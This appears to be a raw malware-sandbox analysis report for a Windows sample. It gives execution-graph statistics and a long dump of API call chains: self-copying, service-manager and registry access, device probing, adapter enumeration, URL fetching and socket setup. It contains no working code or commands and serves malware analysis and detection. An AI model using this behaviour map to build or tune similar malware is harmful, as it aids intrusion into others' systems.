                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                          • Instruction ID: de14e8d07cc4d1fec6b94f0f99926b65e7014e25a7505cf550c56fab82152177
                                                                          • Opcode Fuzzy Hash: defff66af4325d3c28b570447d2f47c0b7c8b64933ddb782de5565f815c6b007
                                                                          • Instruction Fuzzy Hash: 91F0F672640954978A20B5DB89A1A3F724CDA94365760012BEC0CD7203C579CC494BAD

                                                                           Execution Graph

                                                                           Execution Coverage: 2.7%
                                                                           Dynamic/Decrypted Code Coverage: 83.8%
                                                                           Signature Coverage: 13.9%
                                                                           Total number of Nodes: 1041
                                                                           Total number of Limit Nodes: 38

                                                                           Call chains recovered from the execution graph (function address, then the API calls reached from it; "n API calls" is the report's own summary of a subtree it did not expand):

                                                                           Functions inside the 00400000 image:
                                                                           • 40d801 lstrcmpiW → 40d3fa
                                                                           • 40d00d VirtualAlloc
                                                                           • 403310 GetVersion → 404454 HeapCreate (helpers: 40430c 19 API calls; 40482b HeapAlloc; 40507c HeapAlloc, VirtualAlloc, VirtualAlloc, VirtualFree, HeapFree; 40449e HeapDestroy) → 4044aa → 40336f → 404134 (40344f; 403406 7 API calls; 40348d 12 API calls; 404153 GetStartupInfoA → 40428b GetStdHandle → 404299 GetFileType; 404232 GetFileType; 4042cb SetHandleCount) → 403384 GetCommandLineA → 404002 (40401d / 40405d GetEnvironmentStringsW; 404031 / 4040e3 GetEnvironmentStrings; 40407e / 4040ac WideCharToMultiByte; 4040cf FreeEnvironmentStringsW; 404120 FreeEnvironmentStringsA; 403501 → 403559 HeapFree, 40489e VirtualFree, VirtualFree, HeapFree, 40532f VirtualFree, HeapFree, VirtualFree) → 403394 → 403db5 → 403dcc GetModuleFileNameA (406614 19 API calls) → 403e20 → 40339e → 403cfc → 403d9e → 4033a3 → 4033a8 GetStartupInfoA → 403ca4 → 4033ba GetModuleHandleA → 4033de → 403a4b GetCurrentProcess, TerminateProcess, ExitProcess → 4033e7 → 403b20 UnhandledExceptionFilter → 4033f8. The 403374 branch of 40336f reaches 40342b (8 API calls).
                                                                           • 402c93 RegQueryValueExA → 4022bc ⇄ 40d4cc RegCloseKey; 4022bc → 40d794
                                                                           • 402694 → 402753 CopyFileA → 402759 OpenSCManagerA ⇄ 402aef → 40d68e
                                                                           • 40d556 → 40dca1 ⇄ 40dbc9 Sleep; 40dca1 ⇄ 2da3d0f (code outside the image, listed below)

                                                                           Functions outside the image (2d9xxxx to 2e2xxxx):
                                                                           • 2ddf3cf → 2e2c174 → 2d9f8a3 CreateFileA → 2d9f8d4, which loops over 2d9f8ec DeviceIoControl, 2d9f961 GetLastError, 2d9f995 CloseHandle and 2da3b4c (→ 2da2fac _malloc → RtlAllocateHeap; 2da8204 RtlDecodePointer; 2da3b72 std::exception::exception → 2da455a RaiseException; 2da86d4 __NMSG_WRITE; 2da831d GetModuleHandleExW, GetProcAddress, ExitProcess, ___crtCorExitProcess; 2da5e5b __getptd_noexit) → 2d9f99f → 2e2c179 ⇄ 2d9f8a3 (64 API calls)
                                                                           • 2d9648b RtlInitializeCriticalSection, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress → 2d942c7 → 2d964f3 GetTickCount → 2d9605a (59 API calls) → 2d96508 GetVersionExA → 2d96549 __cftof2_l → eight 2da2fac _malloc calls → 2d965ac (6 API calls) → 2d965ff __cftof2_l → 2d96618 RtlEnterCriticalSection, RtlLeaveCriticalSection → four _malloc calls → 2d96692 QueryPerformanceCounter, Sleep → _malloc → 2d966cc __cftof2_l → 2d96708 Sleep → 2d9670e RtlEnterCriticalSection, RtlLeaveCriticalSection → 2d96744 __cftof2_l
                                                                           • 2d9104d → 2da33a4 → 2da32a8 __alloc_osfhnd (2da88ee __lock → 2da8912 RtlEnterCriticalSection; 2da32ec RtlDecodePointer, RtlDecodePointer; 2da915d 60 API calls; 2da8afc 62 API calls; 2da336a RtlEncodePointer; 2da337c RtlEncodePointer, RtlEncodePointer; 2da859c → 2da8a58 RtlLeaveCriticalSection) → 2d91057 → 2d91aa9 InterlockedIncrement → 2d91ac5 WSAStartup, InterlockedExchange → 2d9105c
                                                                           • 2df020b → 2e2c6f2 SHGetSpecialFolderPathA → 2e2c6fd
                                                                           • 2da3d0f → 2da3d18 → 2dab8e1 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter → 2da3d1d → 2da3d32 → 2da3d3e __alloc_osfhnd → 2da3d8c ___DllMainCRTStartup → 2da3b9d __CRT_INIT@12 (138 API calls) → 2da3de9 __alloc_osfhnd → 2da3d2b → back to 40dca1
                                                                           • 2da3b9d __CRT_INIT@12: 2da81e7 GetProcessHeap → 2da5d94 (2da8503 36 API calls; 2da8a1f InitializeCriticalSectionAndSpinCount; 2da918e TlsAlloc; 2da8a6d __calloc_crt; 2da91ea TlsSetValue; 2da5ce1 __initptd → 2da5dee GetCurrentThreadId; 2da5e0a 62 API calls) → 2da3bc6 __RTC_Initialize → 2da3bd6 GetCommandLineA → 2dab97d GetEnvironmentStringsW → 2dab990 WideCharToMultiByte (2da8ab5 59 API calls; 2dab9d0 WideCharToMultiByte; 2da2f74 _free) → 2dab9fa / 2dab9ef FreeEnvironmentStringsW → 2da3be6 → 2dab2cb (__lock; __calloc_crt; 2dab35a GetStartupInfoW; 2dab3f1 / 2dab4fe GetFileType; 2dab4eb GetStdHandle; 2da920c InitializeCriticalSectionAndSpinCount; 2dab576 RtlLeaveCriticalSection, _doexit) → 2da3bf0 → 2dab5d1 → 2dab5e4 GetModuleFileNameA (2da528a 71 API calls, __setmbcp) → 2dab684 _parse_cmdline → 2da3c00 → 2dab800 → 2dab80e _strlen → 2dab844 (__calloc_crt; _free) → 2da3c09 → 2da846b; 2da3c14 → 2dab57f (60 API calls, _free). Other __CRT_INIT@12 branches: 2da3c2b → 2da3c94 → 2da91cb; 2da3ca4 → 2da8a6d __calloc_crt; 2da3cf7 → 2da5c24 (59 API calls); 2da3ccd → 2da3ceb → 2da2f74 _free, or 2da3cd3 → 2da5ce1 __initptd; 2da3cdb GetCurrentThreadId; 2da3c50 → 2da8333 (61 API calls, _free) → 2da3c55 → 2da3c66 → 2da3c7f (62 API calls, __mtterm); 2da3c2f → 2da845c (59 API calls, _doexit). The dump ends at node 2dab8d4.
61015->61016 61080 2da6cbc 59 API calls 2 library calls 61015->61080 61081 2da4f05 8 API calls 2 library calls 61016->61081 61018 2dab8e0 61021 2da8477 __IsNonwritableInCurrentImage 61019->61021 61082 2dad2df 61021->61082 61022 2da8495 __initterm_e 61023 2da33a4 __cinit 68 API calls 61022->61023 61024 2da84b4 _doexit __IsNonwritableInCurrentImage 61022->61024 61023->61024 61024->60933 61025->60909 61026->60929 61027->60900 61028->60908 61029->60915 61030->60911 61031->60909 61033 2da91de 61032->61033 61034 2da91e2 TlsGetValue 61032->61034 61033->60905 61034->60905 61036 2da8a74 61035->61036 61038 2da3cb5 61036->61038 61040 2da8a92 61036->61040 61085 2db04b8 61036->61085 61038->60909 61041 2da91ea TlsSetValue 61038->61041 61040->61036 61040->61038 61093 2da9505 Sleep 61040->61093 61041->60920 61043 2da5ced __alloc_osfhnd 61042->61043 61044 2da88ee __lock 59 API calls 61043->61044 61045 2da5d2a 61044->61045 61096 2da5d82 61045->61096 61048 2da88ee __lock 59 API calls 61049 2da5d4b ___addlocaleref 61048->61049 61099 2da5d8b 61049->61099 61051 2da5d76 __alloc_osfhnd 61051->60928 61053 2da2f7d HeapFree 61052->61053 61057 2da2fa6 __dosmaperr 61052->61057 61054 2da2f92 61053->61054 61053->61057 61104 2da5e5b 59 API calls __getptd_noexit 61054->61104 61056 2da2f98 GetLastError 61056->61057 61057->60909 61058->60909 61059->60941 61060->60943 61061->60947 61062->60948 61063->60956 61064->60955 61065->60967 61066->60987 61067->60989 61068->60981 61071 2dab6a6 61069->61071 61074 2dab70a 61071->61074 61077 2db15d6 59 API calls x_ismbbtype_l 61071->61077 61072 2dab627 61072->61002 61076 2da8ab5 59 API calls 2 library calls 61072->61076 61074->61072 61078 2db15d6 59 API calls x_ismbbtype_l 61074->61078 61075->60994 61076->61000 61077->61071 61078->61074 61079->61006 61080->61015 61081->61018 61083 2dad2e2 RtlEncodePointer 61082->61083 61083->61083 61084 2dad2fc 61083->61084 61084->61022 61086 2db04c3 61085->61086 61092 2db04de 61085->61092 61087 2db04cf 61086->61087 61086->61092 
61094 2da5e5b 59 API calls __getptd_noexit 61087->61094 61088 2db04ee RtlAllocateHeap 61090 2db04d4 61088->61090 61088->61092 61090->61036 61092->61088 61092->61090 61095 2da8204 RtlDecodePointer 61092->61095 61093->61040 61094->61090 61095->61092 61102 2da8a58 RtlLeaveCriticalSection 61096->61102 61098 2da5d44 61098->61048 61103 2da8a58 RtlLeaveCriticalSection 61099->61103 61101 2da5d92 61101->61051 61102->61098 61103->61101 61104->61056 61105 4026d6 61106 4026db 61105->61106 61107 40da35 RegCreateKeyExA 61106->61107 61108 40d866 SetEvent 61106->61108 61110 4026de 61106->61110 61109 40dae1 61107->61109 61111 40d8f7 61108->61111 61109->61108 61109->61110 61111->61111 61112 402998 GetLocalTime 61115 401f27 61112->61115 61114 4029f5 61116 401f3c 61115->61116 61119 401a1d 61116->61119 61118 401f45 61118->61114 61118->61118 61120 401a2c 61119->61120 61125 401a4f CreateFileA 61120->61125 61124 401a3e 61124->61118 61126 401a35 61125->61126 61130 401a7d 61125->61130 61133 401b4b LoadLibraryA 61126->61133 61127 401a98 DeviceIoControl 61127->61130 61129 401b3a CloseHandle 61129->61126 61130->61127 61130->61129 61131 401b0e GetLastError 61130->61131 61142 403106 7 API calls 61130->61142 61143 4030f8 12 API calls 61130->61143 61131->61129 61131->61130 61134 401c21 61133->61134 61135 401b6e GetProcAddress 61133->61135 61134->61124 61136 401b85 61135->61136 61137 401c18 FreeLibrary 61135->61137 61138 401b95 GetAdaptersInfo 61136->61138 61139 401c15 61136->61139 61144 403106 7 API calls 61136->61144 61145 4030f8 12 API calls 61136->61145 61137->61134 61138->61136 61139->61137 61142->61130 61143->61130 61144->61136 61145->61136 61146 40d39b LoadLibraryExA 61147 40d320 Sleep 61148 2dd36bc 61149 2e0aa7a CreateFileA 61148->61149 61150 2e0aa81 61149->61150 61151 402a23 RegOpenKeyExA 61152 402a3f 61151->61152 61153 2dcfe33 61154 2dcfddc DeleteFileA 61153->61154 61155 2dcfe37 61153->61155 61157 2d972ab InternetOpenA 61158 2d972c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 
61157->61158 61167 2d97389 __cftof2_l 61157->61167 61261 2da4af0 61158->61261 61161 2d97382 InternetCloseHandle 61161->61167 61162 2d97342 InternetReadFile 61166 2d97377 InternetCloseHandle 61162->61166 61163 2d96708 Sleep 61164 2d9670e RtlEnterCriticalSection RtlLeaveCriticalSection 61163->61164 61172 2d96744 __cftof2_l 61164->61172 61166->61161 61168 2d973e9 RtlEnterCriticalSection RtlLeaveCriticalSection 61167->61168 61196 2d966f4 61167->61196 61263 2da233c 61168->61263 61170 2d97413 61171 2d97463 61170->61171 61174 2da233c 66 API calls 61170->61174 61173 2da233c 66 API calls 61171->61173 61171->61196 61175 2d97484 61173->61175 61176 2d97427 61174->61176 61177 2d97738 61175->61177 61180 2da2fac _malloc 59 API calls 61175->61180 61176->61171 61179 2da233c 66 API calls 61176->61179 61178 2da233c 66 API calls 61177->61178 61181 2d97750 61178->61181 61182 2d9743b 61179->61182 61183 2d9749d RtlEnterCriticalSection RtlLeaveCriticalSection 61180->61183 61184 2d9779d 61181->61184 61187 2d9775a __cftof2_l 61181->61187 61182->61171 61186 2da233c 66 API calls 61182->61186 61212 2d974d5 __cftof2_l 61183->61212 61185 2da233c 66 API calls 61184->61185 61188 2d977ab 61185->61188 61189 2d9744f 61186->61189 61192 2d9776a RtlEnterCriticalSection RtlLeaveCriticalSection 61187->61192 61190 2d977b1 61188->61190 61191 2d977d0 61188->61191 61189->61171 61194 2da233c 66 API calls 61189->61194 61316 2d961f5 61190->61316 61195 2da233c 66 API calls 61191->61195 61192->61196 61194->61171 61197 2d977de 61195->61197 61196->61163 61196->61164 61198 2d97b00 61197->61198 61201 2d977f0 61197->61201 61199 2da233c 66 API calls 61198->61199 61200 2d97b0e 61199->61200 61200->61196 61202 2da2fac _malloc 59 API calls 61200->61202 61201->61196 61319 2da2418 61201->61319 61207 2d97b22 __cftof2_l 61202->61207 61206 2d978aa 61208 2d978e2 RtlEnterCriticalSection 61206->61208 61209 2d97b4f 61207->61209 61389 2d9534d 93 API calls 2 library calls 61207->61389 61210 2d9790f RtlLeaveCriticalSection 61208->61210 
61211 2d97905 61208->61211 61215 2da2f74 _free 59 API calls 61209->61215 61337 2d93c67 61210->61337 61211->61210 61217 2da233c 66 API calls 61212->61217 61221 2d9755c 61212->61221 61214 2da2fac _malloc 59 API calls 61222 2d97593 __cftof2_l 61214->61222 61215->61196 61217->61221 61221->61214 61226 2d975f8 61222->61226 61382 2da35e6 60 API calls 2 library calls 61222->61382 61225 2d97ae7 61388 2d99003 88 API calls __EH_prolog 61225->61388 61229 2da2f74 _free 59 API calls 61226->61229 61231 2d975fe 61229->61231 61231->61177 61233 2da3b4c _Allocate 60 API calls 61231->61233 61240 2d9760e 61233->61240 61238 2d9a725 73 API calls 61246 2d97a1a 61238->61246 61239 2d97629 61273 2d9a84f 61239->61273 61240->61239 61385 2d99737 212 API calls __EH_prolog 61240->61385 61244 2d9763f 61277 2d95119 61244->61277 61245 2d975c4 61245->61226 61383 2da2850 59 API calls _vscan_fn 61245->61383 61384 2da35e6 60 API calls 2 library calls 61245->61384 61247 2d9a725 73 API calls 61246->61247 61251 2d97aaf 61246->61251 61249 2d97a6b 61247->61249 61249->61251 61362 2d9d117 61249->61362 61367 2d983ea 61251->61367 61252 2d97687 61306 2d9ac0f 61252->61306 61255 2d976ec Sleep 61386 2da18f0 GetProcessHeap HeapFree 61255->61386 61256 2d976e7 shared_ptr 61256->61255 61258 2d97708 61259 2d97722 shared_ptr 61258->61259 61387 2d94100 GetProcessHeap HeapFree 61258->61387 61259->61177 61262 2d97322 InternetOpenUrlA 61261->61262 61262->61161 61262->61162 61264 2da2348 61263->61264 61265 2da236b 61263->61265 61264->61265 61267 2da234e 61264->61267 61392 2da2383 66 API calls 5 library calls 61265->61392 61390 2da5e5b 59 API calls __getptd_noexit 61267->61390 61268 2da237e 61268->61170 61270 2da2353 61391 2da4ef5 9 API calls __write_nolock 61270->61391 61272 2da235e 61272->61170 61274 2d9a859 __EH_prolog 61273->61274 61393 2d9e000 61274->61393 61276 2d9a877 shared_ptr 61276->61244 61278 2d95123 __EH_prolog 61277->61278 61397 2da0b10 61278->61397 61281 2d93c67 72 API calls 61282 2d9514a 61281->61282 61283 
2d93d7e 64 API calls 61282->61283 61284 2d95158 61283->61284 61285 2d9833b 89 API calls 61284->61285 61286 2d9516c 61285->61286 61287 2d95322 shared_ptr 61286->61287 61288 2d9a725 73 API calls 61286->61288 61287->61252 61289 2d9519d 61288->61289 61289->61287 61290 2d951c4 61289->61290 61291 2d951f6 61289->61291 61293 2d9a725 73 API calls 61290->61293 61292 2d9a725 73 API calls 61291->61292 61295 2d95207 61292->61295 61294 2d951d4 61293->61294 61294->61287 61298 2d9a725 73 API calls 61294->61298 61295->61287 61296 2d9a725 73 API calls 61295->61296 61297 2d9524a 61296->61297 61297->61287 61300 2d9a725 73 API calls 61297->61300 61299 2d952b4 61298->61299 61299->61287 61301 2d9a725 73 API calls 61299->61301 61300->61294 61302 2d952da 61301->61302 61302->61287 61303 2d9a725 73 API calls 61302->61303 61304 2d95304 61303->61304 61401 2d9ced9 61304->61401 61307 2d9ac19 __EH_prolog 61306->61307 61425 2d9d0ee 72 API calls 61307->61425 61310 2d9ac3a shared_ptr 61426 2da20f0 61310->61426 61311 2d9ac51 61312 2d976d4 61311->61312 61432 2d93fb0 68 API calls Mailbox 61311->61432 61312->61255 61312->61256 61314 2d9ac5d 61433 2d9a68b 60 API calls 4 library calls 61314->61433 61317 2da2fac _malloc 59 API calls 61316->61317 61318 2d96208 61317->61318 61320 2da2449 61319->61320 61321 2da2434 61319->61321 61320->61321 61323 2da2450 61320->61323 61668 2da5e5b 59 API calls __getptd_noexit 61321->61668 61326 2d97827 61323->61326 61670 2da5f01 79 API calls 7 library calls 61323->61670 61324 2da2439 61669 2da4ef5 9 API calls __write_nolock 61324->61669 61328 2d91ba7 61326->61328 61671 2db53f0 61328->61671 61330 2d91bb1 RtlEnterCriticalSection 61331 2d91be9 RtlLeaveCriticalSection 61330->61331 61333 2d91bd1 61330->61333 61672 2d9e330 61331->61672 61333->61331 61334 2d91c55 RtlLeaveCriticalSection 61333->61334 61334->61206 61335 2d91c22 61335->61334 61338 2da0b10 Mailbox 68 API calls 61337->61338 61339 2d93c7e 61338->61339 61735 2d93ca2 61339->61735 61344 2d93d7e 61345 2d93d99 htons 
61344->61345 61346 2d93dcb htons 61344->61346 61764 2d93bd3 60 API calls 2 library calls 61345->61764 61765 2d93c16 60 API calls 2 library calls 61346->61765 61349 2d93db7 htonl htonl 61350 2d93ded 61349->61350 61351 2d9833b 61350->61351 61352 2d98374 61351->61352 61353 2d98353 61351->61353 61356 2d9796c 61352->61356 61769 2d92ac7 61352->61769 61766 2d995fd 61353->61766 61356->61225 61357 2d9a725 61356->61357 61358 2da0b10 Mailbox 68 API calls 61357->61358 61360 2d9a73f 61358->61360 61359 2d979b8 61359->61238 61359->61251 61360->61359 61840 2d92db5 61360->61840 61363 2da0b10 Mailbox 68 API calls 61362->61363 61364 2d9d12d 61363->61364 61365 2d9d21b 61364->61365 61366 2d92db5 73 API calls 61364->61366 61365->61251 61366->61364 61368 2d98405 WSASetLastError shutdown 61367->61368 61369 2d983f5 61367->61369 61371 2d9a509 69 API calls 61368->61371 61370 2da0b10 Mailbox 68 API calls 61369->61370 61372 2d97ac7 61370->61372 61373 2d98422 61371->61373 61375 2d933b2 61372->61375 61373->61372 61374 2da0b10 Mailbox 68 API calls 61373->61374 61374->61372 61376 2d933e1 61375->61376 61377 2d933c4 InterlockedCompareExchange 61375->61377 61379 2d929ee 76 API calls 61376->61379 61377->61376 61378 2d933d6 61377->61378 61864 2d932ab 78 API calls 2 library calls 61378->61864 61381 2d933f1 61379->61381 61381->61225 61382->61245 61383->61245 61384->61245 61385->61239 61386->61258 61387->61259 61388->61196 61389->61209 61390->61270 61391->61272 61392->61268 61394 2d9e00a __EH_prolog 61393->61394 61395 2da3b4c _Allocate 60 API calls 61394->61395 61396 2d9e021 61395->61396 61396->61276 61398 2da0b39 61397->61398 61399 2d9513d 61397->61399 61400 2da33a4 __cinit 68 API calls 61398->61400 61399->61281 61400->61399 61402 2da0b10 Mailbox 68 API calls 61401->61402 61403 2d9cef3 61402->61403 61404 2d9d002 61403->61404 61406 2d92b95 61403->61406 61404->61287 61407 2d92bb1 61406->61407 61408 2d92bc7 61406->61408 61409 2da0b10 Mailbox 68 API calls 61407->61409 61411 2d92bd2 61408->61411 61419 2d92bdf 
61408->61419 61414 2d92bb6 61409->61414 61410 2d92be2 WSASetLastError WSARecv 61421 2d9a509 61410->61421 61413 2da0b10 Mailbox 68 API calls 61411->61413 61413->61414 61414->61403 61415 2d92d22 61424 2d91996 68 API calls __cinit 61415->61424 61417 2d92cbc WSASetLastError select 61418 2d9a509 69 API calls 61417->61418 61418->61419 61419->61410 61419->61414 61419->61415 61419->61417 61420 2da0b10 68 API calls Mailbox 61419->61420 61420->61419 61422 2da0b10 Mailbox 68 API calls 61421->61422 61423 2d9a515 WSAGetLastError 61422->61423 61423->61419 61424->61414 61425->61310 61434 2da33b9 61426->61434 61429 2da2114 61429->61311 61430 2da213d ResumeThread 61430->61311 61431 2da2136 CloseHandle 61431->61430 61432->61314 61435 2da33db 61434->61435 61436 2da33c7 61434->61436 61437 2da8a6d __calloc_crt 59 API calls 61435->61437 61458 2da5e5b 59 API calls __getptd_noexit 61436->61458 61439 2da33e8 61437->61439 61441 2da3439 61439->61441 61453 2da5c5a 61439->61453 61440 2da33cc 61459 2da4ef5 9 API calls __write_nolock 61440->61459 61444 2da2f74 _free 59 API calls 61441->61444 61447 2da343f 61444->61447 61445 2da210b 61445->61429 61445->61430 61445->61431 61447->61445 61460 2da5e3a 59 API calls 3 library calls 61447->61460 61448 2da5ce1 __initptd 59 API calls 61449 2da33fe CreateThread 61448->61449 61449->61445 61452 2da3431 GetLastError 61449->61452 61477 2da3519 61449->61477 61452->61441 61461 2da5c72 GetLastError 61453->61461 61455 2da5c60 61456 2da33f5 61455->61456 61475 2da8440 59 API calls 3 library calls 61455->61475 61456->61448 61458->61440 61459->61445 61460->61445 61462 2da91cb __getptd_noexit TlsGetValue 61461->61462 61463 2da5c87 61462->61463 61464 2da5cd5 SetLastError 61463->61464 61465 2da8a6d __calloc_crt 56 API calls 61463->61465 61464->61455 61466 2da5c9a 61465->61466 61466->61464 61476 2da91ea TlsSetValue 61466->61476 61468 2da5cae 61469 2da5ccc 61468->61469 61470 2da5cb4 61468->61470 61472 2da2f74 _free 56 API calls 61469->61472 61471 2da5ce1 __initptd 56 API 
calls 61470->61471 61473 2da5cbc GetCurrentThreadId 61471->61473 61474 2da5cd2 61472->61474 61473->61464 61474->61464 61476->61468 61478 2da3522 __threadstartex@4 61477->61478 61479 2da91cb __getptd_noexit TlsGetValue 61478->61479 61480 2da3528 61479->61480 61481 2da355b 61480->61481 61482 2da352f __threadstartex@4 61480->61482 61510 2da5aef 59 API calls 6 library calls 61481->61510 61509 2da91ea TlsSetValue 61482->61509 61485 2da353e 61486 2da3551 GetCurrentThreadId 61485->61486 61487 2da3544 GetLastError RtlExitUserThread 61485->61487 61489 2da3576 ___crtIsPackagedApp 61486->61489 61487->61486 61488 2da358a 61499 2da3452 61488->61499 61489->61488 61493 2da34c1 61489->61493 61494 2da34ca LoadLibraryExW GetProcAddress 61493->61494 61495 2da3503 RtlDecodePointer 61493->61495 61496 2da34ec 61494->61496 61497 2da34ed RtlEncodePointer 61494->61497 61498 2da3513 61495->61498 61496->61488 61497->61495 61498->61488 61500 2da345e __alloc_osfhnd 61499->61500 61501 2da5c5a __write_nolock 59 API calls 61500->61501 61502 2da3463 61501->61502 61511 2da2160 61502->61511 61505 2da3473 61506 2da8d94 __XcptFilter 59 API calls 61505->61506 61507 2da3484 61506->61507 61509->61485 61510->61489 61529 2da1610 61511->61529 61514 2da21a8 TlsSetValue 61515 2da21b0 61514->61515 61551 2d9ddb4 61515->61551 61520 2da3493 61521 2da5c72 __getptd_noexit 59 API calls 61520->61521 61522 2da349c 61521->61522 61523 2da34b7 RtlExitUserThread 61522->61523 61524 2da34ab 61522->61524 61525 2da34b0 61522->61525 61666 2da3596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61524->61666 61667 2da5c24 59 API calls 2 library calls 61525->61667 61528 2da34b6 61528->61523 61530 2da1674 61529->61530 61531 2da16f0 61530->61531 61532 2da168c 61530->61532 61538 2da179c WaitForSingleObject 61530->61538 61545 2da1770 CreateEventA 61530->61545 61549 2da178e CloseHandle 61530->61549 61576 2da1c10 GetCurrentProcessId 61530->61576 61533 2da1706 61531->61533 61536 2da1703 CloseHandle 61531->61536 61535 
2da16ce ResetEvent 61532->61535 61539 2da16a5 OpenEventA 61532->61539 61574 2da1c10 GetCurrentProcessId 61532->61574 61567 2da454b 61533->61567 61546 2da16d5 61535->61546 61536->61533 61537 2da171e 61537->61514 61537->61515 61538->61530 61541 2da16bf 61539->61541 61542 2da16c7 61539->61542 61541->61542 61544 2da16c4 CloseHandle 61541->61544 61542->61535 61542->61546 61543 2da16a2 61543->61539 61544->61542 61545->61530 61575 2da1850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61546->61575 61549->61530 61550 2da16ed 61550->61531 61552 2d9ddd6 61551->61552 61578 2d94d86 61552->61578 61553 2d9ddd9 61555 2da1f30 61553->61555 61556 2da1f69 TlsGetValue 61555->61556 61565 2da1f61 Mailbox 61555->61565 61556->61565 61557 2da1fdd 61558 2da2006 61557->61558 61562 2da1ffe GetProcessHeap HeapFree 61557->61562 61558->61520 61559 2da1fb9 61560 2da1610 17 API calls 61559->61560 61563 2da1fc8 61560->61563 61561 2da2049 GetProcessHeap HeapFree 61561->61565 61562->61558 61563->61557 61564 2da1fd5 TlsSetValue 61563->61564 61564->61557 61565->61557 61565->61559 61565->61561 61566 2da203b GetProcessHeap HeapFree 61565->61566 61566->61561 61568 2da4553 61567->61568 61569 2da4555 IsProcessorFeaturePresent 61567->61569 61568->61537 61571 2da958f 61569->61571 61577 2da953e 5 API calls ___raise_securityfailure 61571->61577 61573 2da9672 61573->61537 61574->61543 61575->61550 61576->61530 61577->61573 61579 2d94d90 __EH_prolog 61578->61579 61580 2da0b10 Mailbox 68 API calls 61579->61580 61581 2d94da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61580->61581 61582 2d950d4 shared_ptr 61581->61582 61595 2d94dd1 std::bad_exception::bad_exception 61581->61595 61582->61553 61584 2d950a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61585 2d950b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61584->61585 61585->61582 61585->61595 61586 2d9a725 73 API calls 61586->61595 61588 2d94e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61589 2d94e9f RtlEnterCriticalSection 
RtlLeaveCriticalSection 61588->61589 61589->61595 61590 2d9ced9 73 API calls 61590->61595 61595->61584 61595->61585 61595->61586 61595->61588 61595->61589 61595->61590 61598 2d94bed 61595->61598 61622 2d97d24 60 API calls 61595->61622 61623 2d9d00b 60 API calls 2 library calls 61595->61623 61624 2d97cfe 60 API calls std::bad_exception::bad_exception 61595->61624 61625 2d9a9b2 60 API calls 2 library calls 61595->61625 61626 2d9aa8a 210 API calls 3 library calls 61595->61626 61627 2da18f0 GetProcessHeap HeapFree 61595->61627 61628 2d94100 GetProcessHeap HeapFree 61595->61628 61599 2d94bf7 __EH_prolog 61598->61599 61600 2d91ba7 209 API calls 61599->61600 61601 2d94c31 61600->61601 61629 2d93a94 61601->61629 61603 2d94c3c 61604 2d93a94 60 API calls 61603->61604 61605 2d94c56 61604->61605 61632 2d985d2 61605->61632 61610 2da0b10 Mailbox 68 API calls 61611 2d94cb8 61610->61611 61657 2d9c290 61611->61657 61613 2d94ce1 InterlockedExchange 61661 2d92995 95 API calls Mailbox 61613->61661 61615 2d94d3c 61665 2d9861b 75 API calls 2 library calls 61615->61665 61618 2d94d06 61618->61615 61662 2d9858e 76 API calls Mailbox 61618->61662 61663 2d982f8 82 API calls Mailbox 61618->61663 61664 2d92995 95 API calls Mailbox 61618->61664 61619 2d94d57 shared_ptr 61619->61595 61622->61595 61623->61595 61624->61595 61625->61595 61626->61595 61627->61595 61628->61595 61630 2d939ee 60 API calls 61629->61630 61631 2d93ab5 61630->61631 61631->61603 61633 2da0b10 Mailbox 68 API calls 61632->61633 61634 2d985e8 61633->61634 61635 2d99a21 77 API calls 61634->61635 61636 2d98602 61635->61636 61637 2d91712 60 API calls 61636->61637 61638 2d94c8b 61637->61638 61639 2d9e0f8 61638->61639 61640 2d9e102 __EH_prolog 61639->61640 61641 2d91a01 61 API calls 61640->61641 61642 2d9e119 61641->61642 61643 2d9e156 InterlockedExchangeAdd 61642->61643 61644 2da0b10 Mailbox 68 API calls 61642->61644 61646 2d9e191 RtlEnterCriticalSection 61643->61646 61647 2d9e186 61643->61647 61644->61643 61649 2d97f5b 60 API 
calls 61646->61649 61648 2d91ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61647->61648 61651 2d9e18f 61648->61651 61650 2d9e1b7 InterlockedIncrement 61649->61650 61652 2d9e1ce RtlLeaveCriticalSection 61650->61652 61653 2d9e1c7 61650->61653 61655 2d9e852 TlsGetValue 61651->61655 61652->61651 61654 2d927f3 SetWaitableTimer 61653->61654 61654->61652 61656 2d94ca4 61655->61656 61656->61610 61658 2d9c2a3 61657->61658 61659 2d9c2cc 61658->61659 61660 2d9e9c1 83 API calls 61658->61660 61659->61613 61660->61659 61661->61618 61662->61618 61663->61618 61664->61618 61665->61619 61666->61525 61667->61528 61668->61324 61669->61326 61670->61326 61671->61330 61673 2d9e33a __EH_prolog 61672->61673 61674 2da3b4c _Allocate 60 API calls 61673->61674 61675 2d9e343 61674->61675 61676 2d91bfa RtlEnterCriticalSection 61675->61676 61678 2d9e551 61675->61678 61676->61335 61679 2d9e55b __EH_prolog 61678->61679 61682 2d926db RtlEnterCriticalSection 61679->61682 61681 2d9e5b1 61681->61676 61683 2d92728 CreateWaitableTimerA 61682->61683 61684 2d9277e 61682->61684 61686 2d92738 GetLastError 61683->61686 61687 2d9275b SetWaitableTimer 61683->61687 61685 2d927d5 RtlLeaveCriticalSection 61684->61685 61688 2da3b4c _Allocate 60 API calls 61684->61688 61685->61681 61689 2da0b10 Mailbox 68 API calls 61686->61689 61687->61684 61691 2d9278a 61688->61691 61690 2d92745 61689->61690 61726 2d91712 61690->61726 61693 2d927c8 61691->61693 61694 2da3b4c _Allocate 60 API calls 61691->61694 61732 2d97e03 CloseHandle 61693->61732 61696 2d927a9 61694->61696 61698 2d91cf8 CreateEventA 61696->61698 61699 2d91d23 GetLastError 61698->61699 61700 2d91d52 CreateEventA 61698->61700 61704 2d91d33 61699->61704 61701 2d91d6b GetLastError 61700->61701 61702 2d91d96 61700->61702 61706 2d91d7b 61701->61706 61703 2da33b9 __beginthreadex 201 API 